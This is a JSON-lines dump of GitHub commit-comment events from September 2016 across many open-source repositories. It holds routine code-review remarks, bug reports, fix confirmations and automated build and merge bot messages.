{"id":"4598489902","type":"CommitCommentEvent","actor":{"login":"adamvy"},"repo":{"name":"foam-framework/foam"},"payload":{"comment":{"id":19119523,"position":null,"line":null,"path":null,"commit_id":"773c1556cfd2b90f3be20ec0afeb4369967213a3","created_at":"2016-09-21T19:44:55Z","updated_at":"2016-09-21T19:44:55Z","body":"LGTM"}},"created_at":"2016-09-21T19:44:55Z"}
{"id":"4598490497","type":"CommitCommentEvent","actor":{"login":"terminalmage"},"repo":{"name":"terminalmage/salt"},"payload":{"comment":{"id":19119524,"position":null,"line":null,"path":null,"commit_id":"f237fe4d528efd621e1f9adbeb149695e94e65a1","created_at":"2016-09-21T19:45:02Z","updated_at":"2016-09-21T19:45:02Z","body":">Re: _repo_process_pkg_sls\r\n>\r\n>_failed_compile(msg) a good idea to save on repeated code.\r\n>\r\n>L717 Does not look correct, should not contain short_path_name, as you added for the log.error\r\n>\r\n\r\nYou're correct, the idea here was to pre-build the log message since so much of it was similar, and then call str.format() on it once for the log file, once for the errors list. However, I didn't do this properly. Fixed in 83a5c19a.\r\n\r\n>L734 the same looks like errors array has not been set a shorter message without short_path_name\r\n\r\nSame, fixed in 07d88a0a."}},"created_at":"2016-09-21T19:45:02Z"}
{"id":"4598497804","type":"CommitCommentEvent","actor":{"login":"lizmintzias"},"repo":{"name":"lizmintzias/resume"},"payload":{"comment":{"id":19119545,"position":null,"line":null,"path":null,"commit_id":"a7e8133db93474947b3779f4d9825c91c9f55f21","created_at":"2016-09-21T19:46:22Z","updated_at":"2016-09-21T19:46:22Z","body":"Ah, that is very useful to know.  Thanks!  Feel free to stay in touch if you ever do find yourself looking to explore new opportunities. :)  "}},"created_at":"2016-09-21T19:46:22Z"}
{"id":"4598501211","type":"CommitCommentEvent","actor":{"login":"diegodoval"},"repo":{"name":"brave/browser-ios"},"payload":{"comment":{"id":19119558,"position":null,"line":null,"path":null,"commit_id":"29a942cc029bf7c8711747be0fd3b46479f2cf38","created_at":"2016-09-21T19:47:02Z","updated_at":"2016-09-21T19:47:02Z","body":"If this is crashing, then it's very likely that the very first mixpanel track call is being bypassed (and possibly others), which would be pretty bad because that's how the flow is measured to start with. We probably need to lock/queue to avoid losing that call or the data will be confusing and possibly less useful\r\n"}},"created_at":"2016-09-21T19:47:02Z"}
{"id":"4598502911","type":"CommitCommentEvent","actor":{"login":"Latissya10100"},"repo":{"name":"Latissya10100/homework1"},"payload":{"comment":{"id":19119564,"position":null,"line":null,"path":null,"commit_id":"c908ae09aec255d456b32fa3e41985f024e5f2fa","created_at":"2016-09-21T19:47:21Z","updated_at":"2016-09-21T19:47:21Z","body":"Input additional items as we progress in class."}},"created_at":"2016-09-21T19:47:21Z"}
{"id":"4598506397","type":"CommitCommentEvent","actor":{"login":"carl-j-love"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":19119571,"position":null,"line":null,"path":null,"commit_id":"a9e11b68b4dee10cb9e1a519c78a89d919c3b9db","created_at":"2016-09-21T19:48:01Z","updated_at":"2016-09-21T19:48:01Z","body":"...And a remember or cache table for toLO may be a good idea also.\n\nOn Wed, Sep 21, 2016 at 1:01 PM, Carl Love <carl.j.love@gmail.com> wrote:\n\n> Sorry, but I'd need more guidance on that structured type. (I understand\n> \"structured type\", but I don't know where to begin in this case.) As a\n> stopgap compromise, I added a remember table to the type. Perhaps a cached\n> remember table would be better. Also, I see now that LO(anything) was just\n> plain wrong, and I changed it to specfunc(LO).\n>\n> On Wed, Sep 21, 2016 at 8:23 AM, Jacques Carette <notifications@github.com\n> > wrote:\n>\n>> That's an amusing way to do it. But let's not do that -- please build a\n>> proper 'structured type', which does not do any actual computation.\n>>\n>> —\n>> You are receiving this because you authored the thread.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/hakaru-dev/hakaru/commit/a9e11b68b4dee10cb9e1a519c78a89d919c3b9db#commitcomment-19112718>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/ASYo9YTDw1BdSSAJsbtqJUr64-njtJ3hks5qsSG-gaJpZM4KCvGb>\n>> .\n>>\n>\n>\n"}},"created_at":"2016-09-21T19:48:01Z"}
{"id":"4598507550","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19119573,"position":null,"line":null,"path":null,"commit_id":"c58ea292f10f671d6fc33e7484f510e29c8aa075","created_at":"2016-09-21T19:48:14Z","updated_at":"2016-09-21T19:48:14Z","body":"iteration (evanweaver) - x86_64-MacOS-10.10-clang: OK (2378 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-c58ea292f10f671d6fc33e7484f510e29c8aa075-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-c58ea292f10f671d6fc33e7484f510e29c8aa075-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-97.14%25-yellow.svg)</a> \n"}},"created_at":"2016-09-21T19:48:14Z"}
{"id":"4598514032","type":"CommitCommentEvent","actor":{"login":"diegodoval"},"repo":{"name":"brave/browser-ios"},"payload":{"comment":{"id":19119594,"position":null,"line":null,"path":null,"commit_id":"29a942cc029bf7c8711747be0fd3b46479f2cf38","created_at":"2016-09-21T19:49:30Z","updated_at":"2016-09-21T19:49:30Z","body":"a FIFO queue for events would fix the problem, but we should check whether there's a way to have this initialize directly. It's weird that the initialization takes longer than a few msec no?"}},"created_at":"2016-09-21T19:49:30Z"}
{"id":"4598515654","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":19119599,"position":null,"line":null,"path":null,"commit_id":"05866ee3ce0d9d6c8c62742664da6955b9d88932","created_at":"2016-09-21T19:49:49Z","updated_at":"2016-09-21T19:49:49Z","body":"saw approval from JeetKunDoug\nat https://github.com/basho/riak_kv/commit/05866ee3ce0d9d6c8c62742664da6955b9d88932"}},"created_at":"2016-09-21T19:49:49Z"}
{"id":"4598515708","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":19119600,"position":null,"line":null,"path":null,"commit_id":"05866ee3ce0d9d6c8c62742664da6955b9d88932","created_at":"2016-09-21T19:49:49Z","updated_at":"2016-09-21T19:49:49Z","body":"merging basho/riak_kv/feature-bjs-lager3.2.1 = 05866ee3 into borshop-integration-1484-feature-bjs-lager3.2.1"}},"created_at":"2016-09-21T19:49:49Z"}
{"id":"4598515727","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":19119601,"position":null,"line":null,"path":null,"commit_id":"05866ee3ce0d9d6c8c62742664da6955b9d88932","created_at":"2016-09-21T19:49:50Z","updated_at":"2016-09-21T19:49:50Z","body":"basho/riak_kv/feature-bjs-lager3.2.1 = 05866ee3 merged ok, testing candidate = 458fe0de"}},"created_at":"2016-09-21T19:49:50Z"}
{"id":"4598516970","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19119604,"position":null,"line":null,"path":null,"commit_id":"42dd0a8e6f7a1e5e148947287f7c6ea78140956b","created_at":"2016-09-21T19:50:04Z","updated_at":"2016-09-21T19:50:04Z","body":"develop (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (1765 of 1765 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-42dd0a8e6f7a1e5e148947287f7c6ea78140956b-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-42dd0a8e6f7a1e5e148947287f7c6ea78140956b-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-21T19:50:04Z"}
{"id":"4598518488","type":"CommitCommentEvent","actor":{"login":"jkoppel"},"repo":{"name":"jkoppel/project-ironfist"},"payload":{"comment":{"id":19119607,"position":null,"line":null,"path":null,"commit_id":"83cc22bf65196b63d520069a49a71a843623e1ed","created_at":"2016-09-21T19:50:20Z","updated_at":"2016-09-21T19:50:20Z","body":"Good."}},"created_at":"2016-09-21T19:50:20Z"}
{"id":"4598519052","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19119609,"position":null,"line":null,"path":null,"commit_id":"5822760f472a91651701acce2fce3fa92fe6a3f5","created_at":"2016-09-21T19:50:26Z","updated_at":"2016-09-21T19:50:26Z","body":"129956421-Scalable-Sizing-HTRad-Heat-Crash (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2374 of 2374 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5822760f472a91651701acce2fce3fa92fe6a3f5-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5822760f472a91651701acce2fce3fa92fe6a3f5-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-21T19:50:26Z"}
{"id":"4598519388","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19119610,"position":null,"line":null,"path":null,"commit_id":"c58ea292f10f671d6fc33e7484f510e29c8aa075","created_at":"2016-09-21T19:50:30Z","updated_at":"2016-09-21T19:50:30Z","body":"iteration (evanweaver) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-c58ea292f10f671d6fc33e7484f510e29c8aa075-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-21T19:50:30Z"}
{"id":"4598520897","type":"CommitCommentEvent","actor":{"login":"terminalmage"},"repo":{"name":"terminalmage/salt"},"payload":{"comment":{"id":19119613,"position":null,"line":null,"path":null,"commit_id":"f237fe4d528efd621e1f9adbeb149695e94e65a1","created_at":"2016-09-21T19:50:48Z","updated_at":"2016-09-21T19:50:48Z","body":"RE: get_repo_data, you're correct, this was me misreading the code as checking if the winrepo age was less ``< 1``, not ``== -1``. I had made a change elsewhere where we logged differently if the repo metadata was less than one second old, and I conflated the two.\r\n\r\nFixed in cc7f0d12."}},"created_at":"2016-09-21T19:50:48Z"}
{"id":"4598528717","type":"CommitCommentEvent","actor":{"login":"thewonderidiot"},"repo":{"name":"mattcarberry/virtualagc"},"payload":{"comment":{"id":19119629,"position":125,"line":149,"path":"Aurora12/ASCENT_INERTIA_UPDATER.agc","commit_id":"fc9be773b8f6adf536a6822209f3a09847d857b4","created_at":"2016-09-21T19:52:16Z","updated_at":"2016-09-21T19:52:16Z","body":"@rburkey2005 or @jimlawton, what's the usual approach for transcribing symbols like the division symbols here? Replacing them with symbols of similar intent? (like / in this instance)"}},"created_at":"2016-09-21T19:52:16Z"}
{"id":"4598529306","type":"CommitCommentEvent","actor":{"login":"LuanMax"},"repo":{"name":"kasper93/mpc-hc"},"payload":{"comment":{"id":19119630,"position":null,"line":null,"path":null,"commit_id":"209985cde61ed382e5ed0a929ecf6eb07decd1fe","created_at":"2016-09-21T19:52:22Z","updated_at":"2016-09-21T19:52:22Z","body":"How about _\"/dvdpos T#P\\tStart playback at title T, position P (hh:mm:ss)\"_?"}},"created_at":"2016-09-21T19:52:22Z"}
{"id":"4598534550","type":"CommitCommentEvent","actor":{"login":"giacgbj"},"repo":{"name":"ZipArchive/ZipArchive"},"payload":{"comment":{"id":19119640,"position":null,"line":null,"path":null,"commit_id":"d1e5f47e29da8fd661237718316d40519c9f9a00","created_at":"2016-09-21T19:53:23Z","updated_at":"2016-09-21T19:53:23Z","body":"We are simply saying that the behavior of that method has been modified. \r\n\r\nWhen the directory is not present:\r\n* old method: it created the expected directory \"destination+strPath\";\r\n* new method: it creates only the directory \"destination\".\r\n\r\nWe've already understood what happened and corrected our codes creating the directory before invoking that method, while it wasn't needed before.\r\n\r\nIf the tests are passing, you probably haven't tested that case because you assumed the directory must exist before. \r\n\r\nI can't say if it's a problem or not: you just have to decide which way that method should work and avoid changing it :-)\r\n\r\n"}},"created_at":"2016-09-21T19:53:23Z"}
{"id":"4598534566","type":"CommitCommentEvent","actor":{"login":"chimurai"},"repo":{"name":"chimurai/http-proxy-middleware"},"payload":{"comment":{"id":19119641,"position":null,"line":null,"path":null,"commit_id":"53fe79b6c36ca4034c3fd68ffb29bcc81d84e576","created_at":"2016-09-21T19:53:23Z","updated_at":"2016-09-21T19:53:23Z","body":"Just tested the example setup `http-proxy-middleware/examples/websocket` with 20 active connections without issues.\r\n\r\nThis issue is probably similar to #108\r\n\r\nWould be great if you can create a minimal working setup with `express` or `connect` in which the issue is exposed. (http://stackoverflow.com/help/mcve)"}},"created_at":"2016-09-21T19:53:23Z"}
{"id":"4598539089","type":"CommitCommentEvent","actor":{"login":"CptChaos"},"repo":{"name":"SunDwarf/OWAPI"},"payload":{"comment":{"id":19119651,"position":null,"line":null,"path":null,"commit_id":"4fa1f932a4e7a68d2a4fb7f03f34a36766e40a67","created_at":"2016-09-21T19:54:14Z","updated_at":"2016-09-21T19:54:14Z","body":"Are the JSON fields also being sorted? E.g. medals_gold, medals_silver, medals_bronze and medals_total under each other in stead of spread within the reply or is that going to be another update / PR? :)"}},"created_at":"2016-09-21T19:54:14Z"}
{"id":"4598540024","type":"CommitCommentEvent","actor":{"login":"Cogbot3"},"repo":{"name":"marine1vane/DVTrading"},"payload":{"comment":{"id":19119652,"position":null,"line":null,"path":null,"commit_id":"86b200596d4bd2968735b637dcc077f601b8de8b","created_at":"2016-09-21T19:54:25Z","updated_at":"2016-09-21T19:54:25Z","body":"Sure\n\nCheers,\nRuss Vane\n\n> On Sep 21, 2016, at 2:23 PM, Duke <notifications@github.com> wrote:\n> \n> Lets see if I can accept this\n> \n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n"}},"created_at":"2016-09-21T19:54:25Z"}
{"id":"4598540104","type":"CommitCommentEvent","actor":{"login":"khurshid-alam"},"repo":{"name":"numixproject/numix-gtk-theme"},"payload":{"comment":{"id":19119653,"position":null,"line":null,"path":null,"commit_id":"62b93afbecf09ceee2db01a9465c787769d6280d","created_at":"2016-09-21T19:54:26Z","updated_at":"2016-09-21T19:54:26Z","body":"Oops! Our gresource prefix remained same. so it should be\r\n\r\n```sh\r\n\t\tcp -t \"${_DIR}\" \\\r\n\t\t\t\"${GTKVER}/gtk.css\" \\\r\n\t\t\t\"${GTKVER}/gtk-dark.css\" \\\r\n\t\t\t\"${GTKVER}/gtk.gresource\" \\\r\n\t\t\t\"${GTKVER}/thumbnail.png\"\r\n\r\n\t\tcp -t \"${_DIR}/dist\" \\\r\n\t\t\t\"${GTKVER}/dist/gtk.css\" \\\r\n\t\t\t\"${GTKVER}/dist/gtk-dark.css\"\r\n```\r\n\r\nNow fixed. :/ "}},"created_at":"2016-09-21T19:54:26Z"}
{"id":"4598543373","type":"CommitCommentEvent","actor":{"login":"SunDwarf"},"repo":{"name":"SunDwarf/OWAPI"},"payload":{"comment":{"id":19119660,"position":null,"line":null,"path":null,"commit_id":"4fa1f932a4e7a68d2a4fb7f03f34a36766e40a67","created_at":"2016-09-21T19:55:02Z","updated_at":"2016-09-21T19:55:02Z","body":"Well, I could make it sorted, but I don't see why - it'd just add slightly more time to the request; they're just hashmaps anyway."}},"created_at":"2016-09-21T19:55:02Z"}
{"id":"4598546979","type":"CommitCommentEvent","actor":{"login":"Wndrr"},"repo":{"name":"Wndrr/Ponteilla"},"payload":{"comment":{"id":19119670,"position":null,"line":null,"path":null,"commit_id":"39b8017076d65cd00ac8f61bf14a774f74d24209","created_at":"2016-09-21T19:55:41Z","updated_at":"2016-09-21T19:55:41Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;2BcDuyjS&#x2F;26-images-resize\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Images - Resize</a>"}},"created_at":"2016-09-21T19:55:41Z"}
{"id":"4598547960","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19119674,"position":null,"line":null,"path":null,"commit_id":"5822760f472a91651701acce2fce3fa92fe6a3f5","created_at":"2016-09-21T19:55:52Z","updated_at":"2016-09-21T19:55:52Z","body":"129956421-Scalable-Sizing-HTRad-Heat-Crash (mjwitte) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5822760f472a91651701acce2fce3fa92fe6a3f5-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-21T19:55:52Z"}
{"id":"4598548631","type":"CommitCommentEvent","actor":{"login":"andreasnoack"},"repo":{"name":"jeff-regier/Celeste.jl"},"payload":{"comment":{"id":19119675,"position":37,"line":230,"path":"src/source_division_inference.jl","commit_id":"0c69e48646808440430563a52c44542fbcf0fe7f","created_at":"2016-09-21T19:55:59Z","updated_at":"2016-09-21T19:55:59Z","body":"Do you have local changes to `Garbo.jl` that you haven't pushed? [This line](https://github.com/kpamnany/Garbo.jl/blob/master/src/Garbo.jl#L99 only) only returns a single element so I get\r\n```\r\nERROR: LoadError: BoundsError: attempt to access 1-element Array{Int64,1} at index [2]\r\n```"}},"created_at":"2016-09-21T19:55:59Z"}
{"id":"4598551589","type":"CommitCommentEvent","actor":{"login":"andreasnoack"},"repo":{"name":"jeff-regier/Celeste.jl"},"payload":{"comment":{"id":19119681,"position":4,"line":192,"path":"src/source_division_inference.jl","commit_id":"0c69e48646808440430563a52c44542fbcf0fe7f","created_at":"2016-09-21T19:56:31Z","updated_at":"2016-09-21T19:56:31Z","body":"`rfc` is only defined in line 194 so this line fails."}},"created_at":"2016-09-21T19:56:31Z"}
{"id":"4598557754","type":"CommitCommentEvent","actor":{"login":"sargon"},"repo":{"name":"freifunk-kiel/ffmap-backend"},"payload":{"comment":{"id":19119690,"position":2,"line":2,"path":"mkmap.sh","commit_id":"aba5dd98a8757e7b114d973a246248fcdd619855","created_at":"2016-09-21T19:57:41Z","updated_at":"2016-09-21T19:57:41Z","body":"if [ \"$(pgrep -c $(basename $0))\" -gt 2 ]; then"}},"created_at":"2016-09-21T19:57:41Z"}
{"id":"4598560991","type":"CommitCommentEvent","actor":{"login":"wluyima"},"repo":{"name":"wluyima/openmrs-core"},"payload":{"comment":{"id":19119701,"position":6,"line":38,"path":"api/src/main/java/org/openmrs/Voidable.java","commit_id":"8d0614e9dc11dec17093729aa11857c26b4f1c7a","created_at":"2016-09-21T19:58:17Z","updated_at":"2016-09-21T19:58:17Z","body":"Ignore this, we would have to get rid of this, I just didn't because It doesn't really belong to this refactoring"}},"created_at":"2016-09-21T19:58:17Z"}
{"id":"4598564608","type":"CommitCommentEvent","actor":{"login":"wluyima"},"repo":{"name":"wluyima/openmrs-core"},"payload":{"comment":{"id":19119712,"position":20,"line":80,"path":"api/src/main/java/org/openmrs/api/db/hibernate/AuditableInterceptor.java","commit_id":"8d0614e9dc11dec17093729aa11857c26b4f1c7a","created_at":"2016-09-21T19:59:01Z","updated_at":"2016-09-21T19:59:01Z","body":"We probably need to make this change too for option-2"}},"created_at":"2016-09-21T19:59:01Z"}
{"id":"4598567132","type":"CommitCommentEvent","actor":{"login":"msrodri"},"repo":{"name":"manifoldjs/manifold-api"},"payload":{"comment":{"id":19119719,"position":null,"line":null,"path":null,"commit_id":"218a29f66ca2a8827dbb44e63334159cea94381b","created_at":"2016-09-21T19:59:29Z","updated_at":"2016-09-21T19:59:29Z","body":"This addresses #36"}},"created_at":"2016-09-21T19:59:29Z"}
{"id":"4598567451","type":"CommitCommentEvent","actor":{"login":"richardfullmer"},"repo":{"name":"opensoft/doctrine-postgres-types"},"payload":{"comment":{"id":19119721,"position":null,"line":null,"path":null,"commit_id":"7e69bdfeb2ae61c2f1e90872370cdf0135fb3006","created_at":"2016-09-21T19:59:33Z","updated_at":"2016-09-21T19:59:33Z","body":"Fixed in d1711b6"}},"created_at":"2016-09-21T19:59:33Z"}
{"id":"4598569278","type":"CommitCommentEvent","actor":{"login":"azah"},"repo":{"name":"SunDwarf/OWAPI"},"payload":{"comment":{"id":19119724,"position":null,"line":null,"path":null,"commit_id":"4fa1f932a4e7a68d2a4fb7f03f34a36766e40a67","created_at":"2016-09-21T19:59:53Z","updated_at":"2016-09-21T19:59:53Z","body":"I don't see the point in sorting it. If you collect the data & parse it, you can just call whatever fields you want in whatever order anyways."}},"created_at":"2016-09-21T19:59:53Z"}
{"id":"4598569625","type":"CommitCommentEvent","actor":{"login":"khurshid-alam"},"repo":{"name":"numixproject/numix-gtk-theme"},"payload":{"comment":{"id":19119725,"position":null,"line":null,"path":null,"commit_id":"62b93afbecf09ceee2db01a9465c787769d6280d","created_at":"2016-09-21T19:59:57Z","updated_at":"2016-09-21T19:59:57Z","body":"@cdysthe Now it should work on all DEs."}},"created_at":"2016-09-21T19:59:57Z"}
{"id":"4593607932","type":"CommitCommentEvent","actor":{"login":"ronawho"},"repo":{"name":"chapel-lang/chapel"},"payload":{"comment":{"id":19107060,"position":null,"line":null,"path":null,"commit_id":"121463b59c5f83a64e4ff82d9726243e98cb9d2e","created_at":"2016-09-21T02:00:14Z","updated_at":"2016-09-21T02:00:14Z","body":"I'm testing a cleaned up version of this: https://github.com/chapel-lang/chapel/compare/master...ronawho:fix-privatization-races?expand=1\r\n\r\nLike you suggested over mail I think we'll want to add some explicit runtime tests. I think we should have one  or more serial versions that calls with pids that we know will break this, and a parallel stress tests.\r\n\r\nFor the serial cases I'm thinking something like:\r\n\r\n```chapel \r\n// miss the init case\r\n__primitive(\"chpl_newPrivatizedClass\", <whatever>, 1);\r\n```\r\n\r\n```chapel\r\n__primitive(\"chpl_newPrivatizedClass\", <whatever>, 0);\r\n// trigger too small of a reallocation \r\n__primitive(\"chpl_newPrivatizedClass\", <whatever>, 2048);\r\n```\r\n\r\nand theres's probably a couple of other less extreme variations of that, that we'll want to test.\r\n\r\n\r\nI also think we can avoid leaking the old privatized arrays, but that'll be something for post-release.\r\n\r\nThe basic idea would be to do something like \r\n\r\n\r\n```c\r\n      ...\r\n      tmp = chpl_mem_allocMany(chpl_capPrivateObjects, sizeof(void *),\r\n                               CHPL_RT_MD_COMM_PRV_OBJ_ARRAY, 0, 0);\r\n      tmp2  = chpl_privateObjects;\r\n      chpl_memcpy((void*)tmp, (void*)chpl_privateObjects, (oldCap)*sizeof(void*));\r\n      atomic_store(chpl_privateObjects, tmp);\r\n      chpl_mem_free(tmp2);\r\n      ...\r\n    }\r\n    extern void* chpl_getPrivatizedClass(int64_t i) {\r\n      return atomic_load(chpl_privateObjects)[i];\r\n    }\r\n\r\n    // and we'd need a chpl_privatization_exit() to free on program teardown.\r\n```\r\n"}},"created_at":"2016-09-21T02:00:14Z"}
{"id":"4593612889","type":"CommitCommentEvent","actor":{"login":"shinpeimuraoka"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":19107074,"position":671,"line":671,"path":"ryu/app/rest_vtep.py","commit_id":"fd389b2a52d245cd02426e39608ef0b73b879fd0","created_at":"2016-09-21T02:01:55Z","updated_at":"2016-09-21T02:01:55Z","body":"キー値をvniへ設定していますが、この後vniは使用していないようです。\r\n`_`のほうがよいのではないのでしょうか？\r\n"}},"created_at":"2016-09-21T02:01:55Z"}
{"id":"4593614988","type":"CommitCommentEvent","actor":{"login":"moxinlang"},"repo":{"name":"moxinlang/SSM"},"payload":{"comment":{"id":19107077,"position":null,"line":null,"path":null,"commit_id":"fd29d3d4d281877f641ccd913a2f4195c4e4a6dd","created_at":"2016-09-21T02:02:37Z","updated_at":"2016-09-21T02:02:37Z","body":"测试合并代码！"}},"created_at":"2016-09-21T02:02:37Z"}
{"id":"4593621064","type":"CommitCommentEvent","actor":{"login":"xfunforx"},"repo":{"name":"xfunforx/XglyphiOS"},"payload":{"comment":{"id":19107090,"position":null,"line":null,"path":null,"commit_id":"bdf58092799d32aa53a57f5fb44612ba11339a96","created_at":"2016-09-21T02:04:22Z","updated_at":"2016-09-21T02:04:22Z","body":"you can compile it with theos.\n\n2016-09-21 6:03 GMT+08:00 MarcusTwist <notifications@github.com>:\n\n> Also really interested in this tweak but have no idea how to compile it,\n> can it be installed using Cydia if it was compiled and added to a repo?\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/xfunforx/XglyphiOS/commit/bdf58092799d32aa53a57f5fb44612ba11339a96#commitcomment-19104941>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ANVDrOjoB8TkiN7q5_BXwqY676GvHHJMks5qsFgvgaJpZM4KABDI>\n> .\n>\n"}},"created_at":"2016-09-21T02:04:22Z"}
{"id":"4593621358","type":"CommitCommentEvent","actor":{"login":"deanius"},"repo":{"name":"deanius/meteor-trivia"},"payload":{"comment":{"id":19107092,"position":null,"line":null,"path":null,"commit_id":"48ec5bbd4de571e4300283b7f64a384569772194","created_at":"2016-09-21T02:04:27Z","updated_at":"2016-09-21T02:04:27Z","body":"Pinging @samhatoum "}},"created_at":"2016-09-21T02:04:27Z"}
{"id":"4593621563","type":"CommitCommentEvent","actor":{"login":"XD-DENG"},"repo":{"name":"XD-DENG/ECharts2Shiny"},"payload":{"comment":{"id":19107093,"position":null,"line":null,"path":null,"commit_id":"34dcd151ca287e6f0e93fd6cfdd7093fe92c47ce","created_at":"2016-09-21T02:04:32Z","updated_at":"2016-09-21T02:04:32Z","body":"And removed 'animation' argument from tree map function, as seems it doesn't work"}},"created_at":"2016-09-21T02:04:32Z"}
{"id":"4593621808","type":"CommitCommentEvent","actor":{"login":"40csmith40"},"repo":{"name":"cleanflight/cleanflight"},"payload":{"comment":{"id":19107094,"position":null,"line":null,"path":null,"commit_id":"9ee9c75281ec9f4d7a948571f5c113f37e38c1bc","created_at":"2016-09-21T02:04:37Z","updated_at":"2016-09-21T02:04:37Z","body":"New here but this line failed to compile, should the GYRO_LPF_256HZ just be set to 0 since the #defines were removed?"}},"created_at":"2016-09-21T02:04:37Z"}
{"id":"4593622144","type":"CommitCommentEvent","actor":{"login":"SubDragonzj"},"repo":{"name":"CyanogenMod/android_device_motorola_msm8226-common"},"payload":{"comment":{"id":19107099,"position":null,"line":null,"path":null,"commit_id":"9886760007f5fd9a67916a115833b6f4b60068c1","created_at":"2016-09-21T02:04:44Z","updated_at":"2016-09-21T02:04:44Z","body":"I build for dior(xiaomi red mi note LTE), also msm 8x26, the camera can't connect… "}},"created_at":"2016-09-21T02:04:44Z"}
{"id":"4593622485","type":"CommitCommentEvent","actor":{"login":"CrackerTeg"},"repo":{"name":"BrokenROM/platform_manifest"},"payload":{"comment":{"id":19107101,"position":null,"line":null,"path":null,"commit_id":"24800f4a9b5584dad4f3a6684a1fe89ada6506af","created_at":"2016-09-21T02:04:52Z","updated_at":"2016-09-21T02:04:52Z","body":"LMAO"}},"created_at":"2016-09-21T02:04:52Z"}
{"id":"4593625407","type":"CommitCommentEvent","actor":{"login":"ResidentMario"},"repo":{"name":"ResidentMario/py_d3"},"payload":{"comment":{"id":19107109,"position":27,"line":63,"path":"py-d3.py","commit_id":"8d329c7d5c603e707946a32d45b68ad992c5e9c5","created_at":"2016-09-21T02:05:52Z","updated_at":"2016-09-21T02:05:52Z","body":"`%%d3` cell input is a mixture of HTML and JavaScript code, so I can't shoehorn it all into a JavaScript block.\r\n\r\nSetting `window.d3` = `d3` got it running on my machine (TM).\r\n\r\nTry running the block multiple times. The `%%d3` cell will rarely work the first time you run it, but *should* work on the second."}},"created_at":"2016-09-21T02:05:52Z"}
{"id":"4593626610","type":"CommitCommentEvent","actor":{"login":"johnraff"},"repo":{"name":"BunsenLabs/bunsen-pipemenus"},"payload":{"comment":{"id":19107120,"position":null,"line":null,"path":null,"commit_id":"64133dd99db0542dbbc4f739b7003a78af2ea477","created_at":"2016-09-21T02:06:18Z","updated_at":"2016-09-21T02:06:18Z","body":"PS @2ion I asked for your opinion on this back in August: https://github.com/BunsenLabs/bunsen-utilities/commit/db28c2346bb107b20e9a6a56ae2874265dfe7997#commitcomment-18666762\r\nI took your silence as assent..."}},"created_at":"2016-09-21T02:06:18Z"}
{"id":"4593629864","type":"CommitCommentEvent","actor":{"login":"renatonascalves"},"repo":{"name":"nfe/woo-nfe"},"payload":{"comment":{"id":19107125,"position":738,"line":154,"path":"includes/admin/class-api.php","commit_id":"24d3d1a02142de076f5d64a067ff5512339d493e","created_at":"2016-09-21T02:07:29Z","updated_at":"2016-09-21T02:07:29Z","body":"@gblmarquez I guess this is a mistake? A function inside another... :/"}},"created_at":"2016-09-21T02:07:29Z"}
